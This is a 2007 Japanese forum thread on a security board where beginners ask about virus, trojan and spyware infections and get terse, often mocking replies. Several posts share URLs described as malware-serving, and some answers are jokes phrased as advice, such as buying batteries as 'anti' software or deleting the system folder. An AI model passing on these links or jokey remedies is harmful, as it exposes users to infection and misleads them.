PFWを入れておけば、何があっても、どんなことをしても、絶対安全だと誓えるのなら、
復習してもいい。

こっち見たりもしてました＞＜

> PFWを入れておけば、何があっても、どんなことをしても、絶対安全だと誓えるのなら、
> 復習してもいい。

わかった。復習しなくていい。ずっと無知でいなよ。

ちと　言い過ぎたかも。

言いたかったのは無闇に心配を煽るのはよそうぜってこと。
そんだけ。

>>386
そんなこといってると、ウイルス入ってから泣きを見るぞｗｗｗ

お、アンカー間違いｽﾏｿ
正しくは>>384です。
386すまない。

今までウイルスに掛かったことはない。
これからも掛かることはない。
ウイルスに掛かる前に寿命で逝くからだ。

>>390
（´・ω・） ｶﾜｲｿｽ

これ見えないんですけど、ウィルスじゃないですよね
http://www.rupan.net/uploader/download/1183323816.jpg

これはどういったウイルスなんでしょうか？
http://suzukiairi.net/cgi-bin/up/img/puniairi150.jpg

>>392-393
ｽﾚ違い、誘導
勇気がなくて踏めない人のための鑑定ｽﾚPart14
http://pc11.2ch.net/test/read.cgi/hack/1177503872/

>>393
セキュリティ板 初心者質問スレッドpart91
http://pc11.2ch.net/test/read.cgi/sec/1182048552/795

795 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2007/07/02(月) 22:37:17
↓これウイルスらしいのですが、踏んでしまいました。踏んだらやばいのでしょうか・・・
http://suzukiairi.net/cgi-bin/up/img/puniairi150.jpg

スパイウェアーがたくさん見つかりました。
どう対処したらいいかわかりません。
対処方法手順を教えてください！

>>396
ｱﾝﾁｽﾊﾟｲｳｪｱで駆除

アンチはどこで手に入りますか？

>>398
コンビニ

ありがとうございます。いくらぐらいですか？
完全に直りますか？

>>400
panasonicのアルカリ製がおすすめ。
マンガンは話にならん。

>>400
ぐぐれかす

そう、ひがまないでくださいよ〜かわいそうな子

>>401
ごめんよ。　誰もつっこまないで。

>>396　スパイウェアを見つけたソフトで削除。
見つけたといってるソフトの名前にWIN、Doctorがついてたらそちらの方を削除。

プロバイダーがＯＣＮなのですが、ＯＣＮのウィルスクリアーで駆除出来るでしょうか？

ＤＡＭＥっていうウィルスに感染したみたいなのですが、これって削除さえすれば大丈夫なものでしょうか？

ＤＡＭＥ

ソフォス、2007年6月の『ウイルス傾向レポート』を発表
http://www.sophos.co.jp/pressoffice/news/articles/2007/07/toptenjun07.html

2007年6月におけるWebウイルストップ10

チャートの1位に挙がったIframeは、Webサイトの脆弱性をついて悪質なプログラムをサイト上に埋め込むマルウェアですが、
引き続き大規模な感染を見せ、6月に発見されたWebウイルスのほぼ3分の2を占めています
Iframeなどの悪質なプログラムは、無防備なユーザーがサーフィング中に訪れるのを待っているように見受けられます。
Webサイトは高度なセキュリティ環境で堅牢に運営されるべきですが、実際には多くのサイトがあまりにも無防備なまま使用されているのが現状です。

Webウイルスホスティングサイトトップ10（国別）

今月も中国がチャートのトップに立ちました。
イタリアが初めてチャートインした原因として、Iframeのほか、Webウイルスチャートの2位に挙がっているObfJSによる感染があります。
ObfJSも6月前半に、多くの正規サイトをハッキングして被害を広げました。

【使用OS】　「WinXPsp2」
【Microsoft Update（MU）の状態】　「Auto」　
【使用セキュリティソフトとバージョン】　「Norton internet security 2006」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「Yesssssssss!!!!!!!!」　
【スパイウェア対策ソフト】　「無し」　
【スパイウェア対策ソフトの更新は定期的に行なっているか】　「」
【ルータの有無】　「BBR-4HG」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
「特になし」
スキャンした結果ではないが、C:\直下にDBI.EXEとmoduleName.txtの見知らぬファイルが存在。

【どんな症状が出るか】　「所見無し」
【症状が出る前に何をやったか】　「」
【症状を解決しようとどのような処置を取ったか】　「ad-awareにてスキャン/NISにてスキャン」
【その他の質問】　「DBI.EXEをぐぐると、malwareらしい記載発見。」
DBI.exeのﾌﾟﾛﾊﾟﾃｨを開くと、DOSプログラムへのｼｮｰﾄｶｯﾄが作成されます。
これらに見覚えがないのですが、削除してもいいものでしょうか。

Backdoor.PHP.C99Shell.a
ってウィルスがカスペで検出されました

調べてもよくわかりません。どんな悪さをするんですか？？

Backdoor

>>411
多分>>276踏んだんだろ
>>278

>>412
>>276の画像がどういうのかは分からないのですが
一度白人女性の画像を踏んで感染→削除って作業はした事があります。

Backdoorについて曖昧にしかりかいしていませんが
"ユーザーに気付かれないうちに進入してリモートが出来る"
"勝手にｐｃ内のファイルを自由に操作or流出出来る"
で合ってますか？

問題は感染はしたけれど、リモートされたかが分かりません。
ＰＨＰを入れたって言うのは要はＰＨＰを書くためにエディター？をインストールしたか？
という事ですか？

そもそも何を持って「感染した」と判断したのかな
キャッシュに残っていただけじゃないのか？検出箇所書かないと

>>1も埋められないようならリカバリなり再インストールなり好きにしなさい

【使用OS】　windows 2000 SP4free
【Microsoft Update（MU）の状態】　更新しない設定
【使用セキュリティソフトとバージョン】　なし
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　ない
【スパイウェア対策ソフト】　なし(ルーター付属のオンラインウィルススキャン)
【スパイウェア対策ソフトの更新は定期的に行なっているか】　行ってない
【ルータの有無】　有

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
カスペルスキー オンラインスキャナ レポート
C:\WINNT\system32\KB11505076.exe 感染: Rootkit.Win32.Agent.ea スキップ
C:\WINNT\system32\KB96926207.exe 感染: Rootkit.Win32.Agent.ea スキップ

【どんな症状が出るか】　ログイン画面が出ると再起動され、繰り返される。
【症状が出る前に何をやったか】　インターネットでサイト見てたら突然インターネット接続のヘルプが出て直後再起動が始まった。
【症状を解決しようとどのような処置を取ったか】　
ルーターに付属のウィルススキャンを行ってトロイ７つを削除した。
Windows Update を試行したが出来なかった。
　Windows Update を使用するために必要なファイルがコンピュータに登録されていないか、
　インストールされていません。続行するには、次の手順を実行してください。と出て、
　今すぐファイルを登録または再インストールする (推奨)
　を選んでダウンロードが始まるのですが、updateが利用できなかった。

【その他の質問】　
原因がよくわからず、他に手だてが
ありましたら教えてください。
よろしくお願いします。

>原因がよくわからず、他に手だてが

　　原因はおまえの頭 !

>>416
すいません。

416の追記です。
ブラスターの感染はなく、ケーブルをつないで
インターネットに接続すると再起動が始まってしまいます。

【使用セキュリティソフトとバージョン】　なし

帰れ

>>416
> 【使用OS】　windows 2000 SP4free

ワレザ帰れ

フリーのセキュリティーソフトはおまいには無理そうだから
2000で使えるソフトを買ってきて、潔くOSクリーンインストール。

下手にでれば調子に乗りやがって、糞が！

糞はどっちだ ! !

〜〜〜いじめられっ子逆ギレの巻〜〜〜

いじめられっこがキレるのは逆ギレじゃないだろ…
この場合は泥棒が切れてるだけだし

URLの後ろにjpg.ってかいてあるウィルスあるんですか？

いっぱいあるよ

>>852
http://suzukiairi.net/cgi-bin/up/img/puniairi150.jpg
これ大丈夫でしょうか。なんですか、これ？

パソコン画面の右下で　ウイルスバスター(の図)　をクリックして
終了　としてしまいました。
それから　(ウイルスバスターの図が)右下の画面に出てきません
どうしたら(ウイルスバスター(の図)を)復活できるのでしょうか？

>>428
http://sakuratan.ddo.jp/imgboard/img-box/img20070704163014.jpg

>>429
多重まるち

解決しました

どうなんでしょうか

>>433
なにがでしょう？

突然すいません、スパイウェアをほっとくとどういった事になってしまいますか？

ある日見覚えの無い借金の催促が…

別に見覚えの無いことほっといても問題ないですよね？
スパイウェアはパソコンには支障ないですか？

プロパイダからお叱りのメールが来るようになる

ttp://www.subculture.com/backdoor.html

このHPはウイルスつきでしょうか。詳しい方教えてください。
詳しい方以外は絶対踏まないほうがいいです。

>>437
パソコンには支障ないけど実生活に支障が出る。

あなたの見たサイトの履歴が誰かに知られる、
覚えがなくても正当な借金が出来たり(クレジット番号漏出)とか。

>>439
なんの問題も無い

>>437
そろそろ請求される頃かな・・・

>>433-434
この流れﾜﾛｽｗ

何のクレジットでもバレるんですか！？

知らない間に借金はかなり恐ろしいですね…

ウィルスよりは質がいいんでしょうか？

【使用OS】　「WinXPsp2」
【Microsoft Update（MU）の状態】　「Auto」　
【使用セキュリティソフトとバージョン】　「ウイルスバスター2007」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「最新」
【スパイウェア対策ソフト】　「無し」　
【スパイウェア対策ソフトの更新は定期的に行なっているか】　「はい」
【ルータの有無】　「有」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
「特になし」

【どんな症状が出るか】　「ウイルス検索をかけると「BMPファイルオープンに失敗しました」という大量の小窓。それを全部消すと、「Hello!」という小窓がでる」
【症状が出る前に何をやったか】　「サイト閲覧中」
【症状を解決しようとどのような処置を取ったか】　
ウイルスバスターでスキャン
BitDefender Online Scannerでスキャン
a-squared Freeでスキャン

【その他の質問】　
サイト閲覧中にJS_DLOADER.NUFが検出されました。
慌ててしまってキャッシュをCCleanerで咄嗟に削除してみたのですが、どうにも不安で……
何でスキャンしても症状がでましたが、a-squared Freeで検出されたものを
削除してみたら小窓の数が2つになり、Helloもなくなりました。

メッセンジャー使用中、メンバーに対して自動で無差別に
Here are my very secret pictures for you.
というメッセージと共にmyalbum2007.zipというファイルを送信してしまうですが。
中身はphoto album-2007.scrでした。まあ、ウイルスソフトが削除してしまって、解凍はできないようですが。
同じ症状の方、又は対処方法知ってる方助けてください・。・

yahoo動画や、その他の動画（ようつべやニコニコは観れる）が
突然観れなくなったんだけどウィルスの可能性あるかな？
突然っていうのは今日の朝まで見れてたんだけど夜帰ってきて観ようと思ったら
観れんかった。
もちろんその間設定等全くいじってないから原因が全くわからん。

あの、なぜかスルーされてるんですけど、なぜでしょう。
ウィルスだとおもうんですが、どうしたらよいでしょうか。
http://suzukiairi.net/cgi-bin/up/img/puniairi150.jpg

>>448
＞あの、なぜかスルーされてるんですけど、なぜでしょう。
誰ですか、あなたは？どのレス番の人でしょうか

＞ウィルスだとおもうんですが、
そうですね、ウイルスですね。このスレだけでも>>276で既に出ていますね

＞どうしたらよいでしょうか。
>>278でよいでしょう
不安ならリカバリなり再インストールなりするとなおよいでしょう

>>444
おまいは強盗よりはマシだからといって、こそ泥を家においておくのか

>>450
では、撃退しますか！！やり方よく解りませんが。

>>441
ありがとうございます。
ちなみに何のサイトなのか教えてくれませんか？

>>452
LOVE-LETTER-FOR-YOU.TXT

>>446
photo album-2007.scrでぐぐると結構ヒットするね
中国語サイトばっかでいまいちよくわからんが


Backdoor.IRCBot.ACD
ttp://www.k7computing.com/virusdetails.asp?virusid=46316

↑この辺が症状近そうだけど自分のマシンと見比べてみて
一致するようならこれの手順に従って退治

うっかりしてNortonを無効のままにしておいたらウィルスに感染されて
しまいました。国分太一の「支点・力点・作用点」っていう声が続いて
います。対処法はありませんか？

>>455
ウィルス・スパイウェアのスキャンをしてから出直してこい。

MPack Clearance Sale!
http://www.symantec.com/enterprise/security_response/weblog/2007/07/mpack_clearance_sale.html

すみません。質問ですがマイドキュメントやマイネットワークなどが変なアイコンに変わったんですが
何か原因がありますか？パソコンのスクリーンセーバーいじってたんですけど。
マイネットワークはほかのほかのコンピューターのフォルダにアクセルしたりとか
書かれています。ウィルス検索しても何も見つかりませんが。
どなたか教えてください。
全体的に薄く青くなってしまったのですが

> マイネットワークはほかのほかのコンピューターのフォルダにアクセルしたりとか

どう見ても釣りです、本当に(ry

>>458
何も見つからなかったなら大丈夫でしょ
そのスキャンに使用したものが何だかわからんが

>>454 ありがとうございます！
早速試してみます。

MSNメッセンジャー使用中
「URL張っても理由聞かないでください」っていう名前に変えた友人から
URLはられファイルをＤＬしてしまい
どうやら感染したようです


同じような被害にあわれた方いますか？
どのようなウイルスでどのように対処したか
お教えください

>>462
質問用テンプレを使って書き直してくれ。

あと、そのURLは分からないか？

>>462
ダウンロードしたフォルダを調べてみる。
感染したかもと思ったら、「ウイルススキャンを実行する！」

セキュリティ板 初心者質問スレッドpart91
http://pc11.2ch.net/test/read.cgi/sec/1182048552/918

918 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2007/07/06(金) 02:31:32
ウイルスに盗まれた個人情報が“丸見え”、誰でもアクセス可能に

ttp://itpro.nikkeibp.co.jp/article/NEWS/20070628/276166/?ST=security


Webサイトのアドレスさえ分かれば、ウイルスが盗んだパスワードなどを、誰でも閲覧できる状態になっていた。
Webサイトには、ウイルスが感染したパソコンのマシン名（ホスト名）／ユーザー名（アカウント）ごとにディレクトリが用意されている（図1）。
そしてそのディレクトリの下には、そのパソコンからウイルスが盗んだ銀行の口座情報のほか、Yahoo!やMSNのアカウント（ユーザーIDとパスワード）、
やり取りされたメールの内容などを記述したHTMLファイルが置かれている（図2）。同社スタッフによれば、盗まれたパスワードなどは現在も有効で、
変更されていないだろうという。

>>463
焦っていて１すら読んでませんでした
申し訳ないです

【使用OS】　「XP」
【使用セキュリティソフトとバージョン】　avastアンインストールしカスペルの試用版
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「はい」　
【スパイウェア対策ソフト】　「なし」　
【ルータの有無】　「あり」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
「すべて削除、除去してしまいわかりません」

【どんな症状が出るか】　
どうやら感染したことにより、メッセンジャーで勝手に友達登録した人に
URLを送っているようです
【症状が出る前に何をやったか】　
友人から送られてきたファイルＤＬ、起動
【症状を解決しようとどのような処置を取ったか】　「カスペルスキー完全スキャン」

これがURLです
ttp://7961.ruikinyunhfenduansterdin.com/3128/
*ウイルスです*

追記です
スカイプを起動したら
あまり覚えていないのですが
「sk.exeを使い通信しますか？」
のような注意が出てきました

>>466
ダウンロードした、check.exeを実行した結果がこれ。

ファイル
C:\WINDOWS\System32\kbdemsdm.dll
C:\WINDOWS\System32\kbdemsdm.exe

レジストリ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\kbdemsdm]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager] "PendingFileRenameOperations"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager] "PendingFileRenameOperations"

sk.exeを調べたら、Warezov/Strationと言うウイルスらしい。

>>462
ハックされてるかも
IMを使うときは注意しないと
パスワードを変えて、ウィルス、スパイウェアのスキャンを推奨

駆除して、再起動するとまたセキュリティーに隔離されるウィルスがあるんだけど、ﾅﾆｺﾚ？
セキュリティーソフト
「ウィルスセキュリティー０」
OS
「ウィンドウズXP」隔離されるファイル名
「b.exe」
隔離前の場所
「C\WINDOWS」
説明欄
「Backdoor.Ｗin32.EggDrop」

どういったウィルスで、完全に消し去るにはどうすればよいですか？

ﾘｶﾊﾞﾘ

別のソフトでスキャンする。

ウイルスバスターでは検知されなかったのですが
avastで検査したら、ウイルス項目に出てきました。
これって何でしょうか？
C:\Program Files\Common Files\Microsoft Shared\MSInfo\zhnzvenn.drv
C:\System Volume Information\_restore{C82133B7-C855-45B3-B6FE-E36E8C3BFFE}\RP125\A002587.sys
C:\System Volume Information\_restore{C82133B7-C855-45B3-B6FE-E36E8C3BFFE}\RP140\A003645.drv
C:\System Volume Information\_restore{C82133B7-C855-45B3-B6FE-E36E8C3BFFE}\RP92\A002029.ime

rootkit

>473
＞C:\Program Files\Common Files\Microsoft Shared\MSInfo\zhnzvenn.drv

＞＞Microsoft Shared
この手の名前を使う奴は、まさしく中華系トロイ
さらに>474の言ってるRootkitも入ってる可能性あり
つ「RootkitBuster」

＞C:\System Volume Information\_restore
これについては自分の力で（ググったりして）

473です。
avastでチェストに移動したのですが
それでけではダメでしょうか？
何度もすみません

変なexeファイルを踏んでしまい、
「処理に必要な DSKMAINT.DLL ファイルが見つからないか、このファイルにアクセスできませんでした。」
というダイアログがでて、デスクトップのアイコンがほとんどなくなり、日本語が一部表示されなくなったりしています。
セーフモードも起動できません。

いったいこれは何なんでしょうか。対処法などお教え下さい。よろしくお願いします。

ﾘｶﾊﾞﾘ

出来ればリカバリしたいのですが、HDDの中身をできるだけ守りたいのです。HDDの中身を吸い出す方法はありますか？

どこに有るか解からんものを、おまいが避けられると思えないが ?

>>480
仰っている意味がよく分からないんですが・・・

>>481
ウイルスが何処に有るのか分からない、と言いたいんじゃないか？

つまり、バックアップするファイルが感染している可能性が有ると言うこと。

>>482
�dです。
確かにそうですね・・・。ただ、レジストリが書き換えられているだけのような感じでしたし、
バックアップしたいデータには無いとは思うんですがねぇ・・・

一応聞いてみてますが、そういうPCのHDDからデータを吸い出す方法はあるんですか？

>>483
HDDを外して、別のPCでバックアップする。

LinuxのブータブルCDを使って、外部記憶媒体に保存する。

>>484
ありがとうございます。試してみます

>>476
再度、スキャンして検出されなければ問題ない。

不安なら他のソフトでスキャンすればいい。

どのソフトがいいんでしょうか？

>>487
非常中でBitDefenderがお勧め

>>487
a-squared Free
ttp://www.emsisoft.jp/jp/

Dr.Web CureIt!
ttp://drweb.jp/support/?cureit

ｗ

やっぱ眠い人が居なきゃ駄目だなと思った

常駐のアンチウィルス入れてる状態でオンラインウィルススキャンとかやっても問題ない？

ない

もうどにもならないかもorz

【使用OS】　「XP」
【使用セキュリティソフトとバージョン】　「AnnLabV3 VirusBlock2007」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「更新しました」　
【スパイウェア対策ソフト】　「なし」　
【ルータの有無】　「なし」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
「もう駆除してしまい正式名称は控えてなかったのですがトロイの一種、そして駆除後も症状は治らず」

【どんな症状が出るか】　
「エクスプローラーにおいてF5連打（常時更新）状態
あとたまに立ち上げようとするとﾋﾟｰﾋﾟｰとうるさい音が鳴ることがある（どうしようもないので強制終了してます）」
【症状が出る前に何をやったか】　「いつものネット閲覧」
【症状を解決しようとどのような処置を取ったか】　「上記ウィルスソフトを新しく購入、スキャン」
【その他の質問】　「システムまで侵食してて手遅れということでしょうか･･･orz」

>>494
一時的に、BitDefender 8 Free Editionを入れて削除を試みる
その後はアンインストールする（BitDefenderの使ったレジストリは手動削除する）

>>494
> あとたまに立ち上げようとするとﾋﾟｰﾋﾟｰとうるさい音が鳴ることがある（どうしようもないので強制終了してます）」

こっちはウイルス無関係で、メモリエラーとかCPUエラーとか出てるんじゃないかと。

新たなマルウェア情報
http://pc11.2ch.net/test/read.cgi/software/1066660518/714

先月のだろ

先月出た悪質ルートキットを、
マイクロソフトやNOD32は、
まだ検出できないでいるんだな・・・・orz

Trojan-Downloader.BAT.Ftp.z（常駐ウイルスバスター。オンラインスキャン→SGアンチスパイ2で発見）
に感染してしまいました。
ttp://www.viruslist.com/en/viruses/encyclopedia?virusid=76015

このトロイの木馬の情報を教えて下さい。
調べてみると、sdbot（agobot ？）系のワーム/バックドアをダウンロードしようとする
Downloader型のトロイの木馬であるらしいのですが、外国のサイトが多かったので、
この理解であっているのか自信がありません。
よろしくお願いします。

【使用OS】　「Windows 2000 SP4」
【Microsoft Update（MU）の状態】　「最新」　
【使用セキュリティソフトとバージョン】　「AntiVir パーソナルエディション」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「最新」　
【スパイウェア対策ソフト】　「無し」　
【ルータの有無】　「有り」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
AntiVirでは検出されず、ネットワークにも接続できず、
OSの再インストールも現在できないためウイルス名は不明ですが
Anito.AやPE_FUBALCA.Aの亜種？かと思います

【どんな症状が出るか】

最初
「起動時にブラウザが立ち上がりunion123.comに接続しに行く」

リカバリしようとする
「リカバリしようとするが途中でエラーを吐いて終了してしまう」
「WindowsCDからフォーマットしようとしても完了しない」

「ウイルスに感染していないHDDを接続してフォーマットしようとしたがBIOSすら起動しなくなった。」


【症状が出る前に何をやったか】
「知り合いのHDDのデータを復旧しようと俺のPCに接続。
接続した瞬間にHDD内にあったautorun.exeが立ち上がりウイルスに感染？」

HDD変えても直らないってことはBIOS ROMか
マザボ交換しなきゃダメですかね？もう俺涙目・・・

>>500
ttp://www.bitdefender.com/VIRUS-43596-en--Backdoor.BotGet.FtpB.Gen.html

>>501
メーカー製か自作か判らんが、FDD,CD,HDDを全部外して、BIOSは起動する?

AnitoかPE_FUBALCAだろうと思うけど、BIOSを破壊する程危険とは書いてなかったなぁ。

BIOSに干渉するようなウィルスなんて作れるの？

そりゃ作れるし、昔はそんなのばかりだったけど、今現在BIOSにアクセスする意味は
破壊活動以外に無いし。

そういう自滅型ウイルスはハヤリじゃないと思うが。

流石にCD-ROMドライブに感染するウィルスはないよね？

http://www.itmedia.co.jp/enterprise/articles/0703/05/news080.html

>>495>>496
ありがとうございます。
それを使ってみたところ、新たにトロイがいくつか検出されました
･･･が、駆除してもやはり症状は治らず･･･
これはもうウィルスよりもシステム的な問題なんでしょうか？
素人なのでメモリエラーとかCPUエラーの場合、何をどういじればいいのかわかりません･･･orz

俺みたいに金の無い奴は頭を使う。
お前みたいに頭の無い奴は金を使え。

>>508
新しい電源買え。
俺も似たような状況になったとき電源変えたら直った。

【使用OS】　「2000SP4」
【Microsoft Update（MU）の状態】　「とまってる」　
【使用セキュリティソフトとバージョン】　「avast!4.7」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「yes」　
【スパイウェア対策ソフト】　「ない」　
【スパイウェア対策ソフトの更新は定期的に行なっているか】　「X」
【ルータの有無】　「あり。だけどDMZで使っていたので意味ないと」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
「W32:tenga-B」

【どんな症状が出るか】　「自覚症状なし」
【症状が出る前に何をやったか】　「洒落とかwinnyで落としまくり、キンタマ解凍しまくり。exeやscrみたいなのは踏んでない」
【症状を解決しようとどのような処置を取ったか】　「感染ファイル全削除」
【その他の質問】　「W32:tenga-Bってなんだろ」

　　　　　　, イ)ィ　-─ ──- ､ﾐヽ
　　　 　 ノ ／,．-‐'"´ ｀ヾj ii /　 Λ
　　　 ,ｲ／／ ^ヽj(二ﾌ'"´￣｀ヾ､ﾉｲ{
　　 ノ/,／ミ三ﾆｦ´　　　　　　　 ﾞ､ﾉi!
　　{V /ミ三二,ｲ　, 　／,　　 ,＼　 Yｿ
　　ﾚ'/三二彡ｲ　 .:ィこﾗ 　 ;:こﾗ 　j{
　　V;;;::. ;ｦヾ!V　　　 ｰ '′　i ｰ '　ｿ
　　 Vﾆﾐ( 入　､　　 　 　r　　j　　,′
　　　ヾﾐ､｀ゝ　　｀ ｰ--‐'ゞﾆ<‐-イ
　　　　　ヽ　ヽ　　　　 -''ﾆﾆ‐　 /
　 　 　 　 |　　｀､　　　　 ⌒　 ,/
　　　 　 　|　　　 ＞┻━┻'r‐'´
　　　　　　ヽ＿ 　 　 　 　 |
　　　　　　　　　ヽ ＿ ＿ 」

　　ググレカス [ Gugurecus ]
　　　(2007 〜 没年不明)

すみません。今日、パソコンを使っていたら、急にキーボードの右半分が数字しか打てなくなってしまったのですが、ウィルスでしょうか？改善方法がありましたら教えてください。ちなみにスクリーンキーボードという機能で、なんとかここにたどり着きました。

>>513
ノートPCか?
NumLockキーを押して、インジケーターを消せ。

すぐに返答していただき本当にありがとうございます。元のように戻りました。しかしこのような症状は、ウィルスが原因なのでしょうか？心当たりは何も無いのですが。

>>515
ウイルスとは関係なし。
昔からある、PC用キーボードの仕様。
数値を連続して入力する際、右手だけで入力できるというメリットがある。
NumLockキーは押す度にON,OFFになるので、知らないうちに間違って押したのが原因。

>>516
丁寧に教えていただき、ありがとうございました。

オンラインスキャンをしたら

C:\WINDOWS\real.exe は　Downloader に感染しています。

と出てきたんですけど、このreal.exeって削除しておｋなファイルですか？

>>518
自分のPCだろ…その程度の判断もできないならPC使わない方がいいよ
ttp://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2004-082510-2519-99&tabid=2

オンラインスキャンで引っ掛かってる時点で終わってると思う。
日頃の予防を

これって既出？
ttp://pnpk.net/cms/archives/145
安全にWEBブラウジングを行う@DropMyRights

CNET Japan
IEとFirefoxをインストールしている人は要注意--「非常に重大」なセキュリティリスク　2007/07/11
ttp://japan.cnet.com/news/sec/story/0,2000056024,20352586,00.htm
INTERNET Watch
Firefoxに危険度の高い脆弱性、IEからの呼び出しを悪用　2007/07/11
ttp://internet.watch.impress.co.jp/cda/news/2007/07/11/16317.html
Computerworld.jp
Firefox“プラス”IEで、PCを乗っ取られる脆弱性が発覚――修正パッチはいまだ配布されず 　2007年07月12日
ttp://www.computerworld.jp/news/sec/70529.html
ITpro
Firefox 2.0のURIハンドラに重大な欠陥，IEとの組み合わせが危険，Secuniaが警告 　2007/07/12
ttp://itpro.nikkeibp.co.jp/article/NEWS/20070712/277298/

>>518
その場合、削除するしかないと思う。
初期化をすることを考えたら、削除すべし。

韓国がまたやってくれました
http://s3.s2ch.net/test/-/wwwww.2ch.net/news4vip/1184462358/

もうSistemフォルダごと丸々削除しちまえよｗ

> Sistem

そんな怪しいものは削除でｗ

オラバで調べようとしたら、「ちょっと通りますよ」ってAA
がながれたんだけど何？

　　　　　_, ._
　　ヽ（　ﾟ ∀ﾟ） ノ　　　　だれか〜！
　　へﾉ　　 /　　　　
　　　　ω ノ
　　　　 　 >

つ説明書

systemdoctorやらdevicedoctorやらwinantivirusやらが最近やたら五月蝿いんですが、
こいつらを開かないようにする方法はありますか？

そういう怪しいサイトに近づかない事かな

>>532
google検索時や普通のサイト開いてても突然出てくるんです。

既にやられてるな。
スキャンかけろ。

>533
SmitfraudFixとVundoFixで何とかならないかな？

ttp://www.imgup.org/iup418893.png
これはウィルスですか？

>>534-535
どうも。今のところ来なくなったので、解決した、と思いたいです。
ありがとうございました。

と思ったらまた来ました。どうすればいいんでしょうか・・・。

【使用OS】　「WindowsXP SP2」
【Microsoft Update（MU）の状態】　「最新」　
【使用セキュリティソフトとバージョン】　「NortonAntiVirus
　　　　　　　　　　　　　　　　　　　　　　　　ただしウィルスを検出したのは上記のものではなく、
　　　　　　　　　　　　　　　　　　　　　　　　カスペルスキーのオンラインスキャンです。
　　　　　　　　　　　　　　　　　　　　　　　　ノートン先生にはスルーされました……。」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「最新」　
【スパイウェア対策ソフト】　「Ad-aware、Spybot」　
【スパイウェア対策ソフトの更新は定期的に行なっているか】　「最後に更新したのが1ヶ月ほど前です」
【ルータの有無】　「なし」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
「〜\Alcohol Soft\Alcohol 52\
　Trojan.Win32.Agent.abd」
上記ソフト自体はだいぶ前にインストールしたものですが、
感染が確認できたのは最近です。

【どんな症状が出るか】　「今のところ症状は出ていません」
【症状が出る前に何をやったか】　「-」
【症状を解決しようとどのような処置を取ったか】　「-」
【その他の質問】　「このウィルスを駆除するにはどの駆除ソフトがおすすめでしょうか。
　　　　　　　　　　　　また駆除後にOSの再インストールが必要でしょうか。」

>>538
http://pc11.2ch.net/test/read.cgi/sec/1162464139/

オンラインでポートスキャンできるサイトで
1-65535まで指定可能なとこってありますか？

ttp://www.frogview.com/show1.php?file=3005

>>540
誘導ありがとうございます。向こうで質問してみます。

ttp://winny.cool.ne.jp/lesson1/scan.html
ここでポートスキャンかけても開いてるはずのポートが閉じてると言われてしまうんですが、
（たとえば25とか110とか p2pで開けてるポート）
どうなってるんでしょうか？

>>524
ＥＲＲＯＲ：取得エラー
1:Not Found :2000/01/01 00:00:00 ID:???0
datの取得に失敗しました。

【使用OS】　windows XP SP2
【Microsoft Update（MU）の状態】　最新
【使用セキュリティソフトとバージョン】　NOD32 ver,2.7
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　YES
【スパイウェア対策ソフト】　spybot
【スパイウェア対策ソフトの更新は定期的に行なっているか】　YES
【ルータの有無】　無し

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
出ない

【どんな症状が出るか】　URLにURLを打ち込んで飛ぶといきなりJwordという検索窓が開く

【症状が出る前に何をやったか】　PC security test 2007を使っていた。それ以外はウエブサイト閲覧のみ。
【症状を解決しようとどのような処置を取ったか】　NOD32,spybotによる全スキャン
【その他の質問】　
インストールした覚えがありません。
しかも追加と削除一覧にもソフトが見当たりません。助けてください。

>>546
Jwordをアンインストール

ウチのがどう見ても原田ウイルスかかったorz
家族が勝手にnyやって感染
ゼロの使い魔とかで引っかかるなよもう氏ねよ・・・

ノートン先生はスルー

さらばｦﾁｽﾚ（´・ω・） ｶﾜｲｿｽ　山田ヲチスレ340
http://tmp6.2ch.net/test/read.cgi/download/1184486689/2-5

>>548
Vistaにして「保護者による制限」

Jwordはフィッシングサイト対策に有効だったりする？

fpupdateax.exeという怪しいファイルを発見したんですが、これってウィルスですか？
そうだとしたら対処法は？

fpupdateax.exe の検索結果 約 146 件

検索はしたんですけどイマイチ対策とか出てなくてですね
消去すればそれでいいんでしょうか？

>554
ファイルのプロパティ情報で判断or
ttp://virustotal.com/でスキャン

>>555
プロパティにはアプリケーションとしかでてないし、そのサイトでも何も見つかりませんでした
もしかすると無害なんでしょうか

>556
全般タブ以外に、バージョン情報タブは無かった？
著作権や会社名にMicrosoftの名前が無ければ黒と判断して良いかも。

>>557
すみませんバージョン情報タブというのは無いです
よくわからないのでとりあえず放置しておくことにします
どうもありがとう

「発電所もサイバー攻撃の対象になる」，米SANSのアラン・パーラー氏が警告
http://itpro.nikkeibp.co.jp/article/NEWS/20070717/277606/

「Generic PUP.h」って、どんなウイルス？

440 ：名無しさん＠お腹いっぱい。：2007/05/05(土) 15:41:14
Generic PUP.hてshareの事？

441 ：名無しさん＠お腹いっぱい。：2007/05/05(土) 16:09:59
shareとは限らない。shareをGeneric PUP.hとして検出しただけ。
怪しいプログラムor不審なプログラムのこと
http://www.mcafee.com/japan/security/virG2005.asp?v=Generic%20PUP.a

>>561
レスサンクス。
